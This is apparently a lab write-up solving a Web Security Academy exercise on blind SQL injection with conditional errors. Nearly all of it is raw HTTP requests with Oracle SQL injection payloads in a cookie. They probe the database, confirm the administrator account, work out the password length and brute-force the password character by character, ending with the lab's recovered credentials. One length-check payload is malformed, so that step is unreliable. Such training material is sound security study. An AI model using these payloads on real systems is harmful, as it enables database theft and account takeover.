Skip to content

Blind SQL injection with conditional errors

Blind SQL injection with conditional errors

Solution

Add to TrackingId chat "'"
___
GET /product?productId=2 HTTP/2
Host: 0a5b00cc041be896800208f50085009a.web-security-academy.net
Cookie: TrackingId=D9eXqSXSL7wYPT1N'; session=flJsYqmD0URwktxhaYoikCA54cH8FV7f
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5b00cc041be896800208f50085009a.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Check that DB is Oracle

Payload: 
TrackingId=D9eXqSXSL7wYPT1N'||(SELECT '' FROM dual)||'
___

GET /product?productId=2 HTTP/2
Host: 0a5b00cc041be896800208f50085009a.web-security-academy.net
Cookie: TrackingId=D9eXqSXSL7wYPT1N'||(SELECT '' FROM dual)||'; session=flJsYqmD0URwktxhaYoikCA54cH8FV7f
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5b00cc041be896800208f50085009a.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Check table users exists

Payload:
TrackingId=D9eXqSXSL7wYPT1N'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
___

GET /product?productId=2 HTTP/2
Host: 0a5b00cc041be896800208f50085009a.web-security-academy.net
Cookie: TrackingId=D9eXqSXSL7wYPT1N'||(SELECT '' FROM users WHERE ROWNUM = 1)||'; session=flJsYqmD0URwktxhaYoikCA54cH8FV7f
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5b00cc041be896800208f50085009a.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Check user administrator exists

Payload: TrackingId=D9eXqSXSL7wYPT1N'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
___
GET /product?productId=2 HTTP/2
Host: 0a5b00cc041be896800208f50085009a.web-security-academy.net
Cookie: TrackingId=D9eXqSXSL7wYPT1N'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'; session=flJsYqmD0URwktxhaYoikCA54cH8FV7f
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5b00cc041be896800208f50085009a.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Check how long password is

Password = 20 chars

Payload: TrackingId=D9eXqSXSL7wYPT1N'(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
___
GET /product?productId=2 HTTP/2
Host: 0a5b00cc041be896800208f50085009a.web-security-academy.net
Cookie: TrackingId=D9eXqSXSL7wYPT1N'(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'; session=flJsYqmD0URwktxhaYoikCA54cH8FV7f
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5b00cc041be896800208f50085009a.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Brute force password using "cluster bomb attack"

Password is: 070ca6clxnn890aczfjo
___
GET /product?productId=2 HTTP/2
Host: 0a5b00cc041be896800208f50085009a.web-security-academy.net
Cookie: TrackingId=D9eXqSXSL7wYPT1N'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'; session=flJsYqmD0URwktxhaYoikCA54cH8FV7f
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5b00cc041be896800208f50085009a.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Login as user: administrator

L: administrator
P: 070ca6clxnn890aczfjo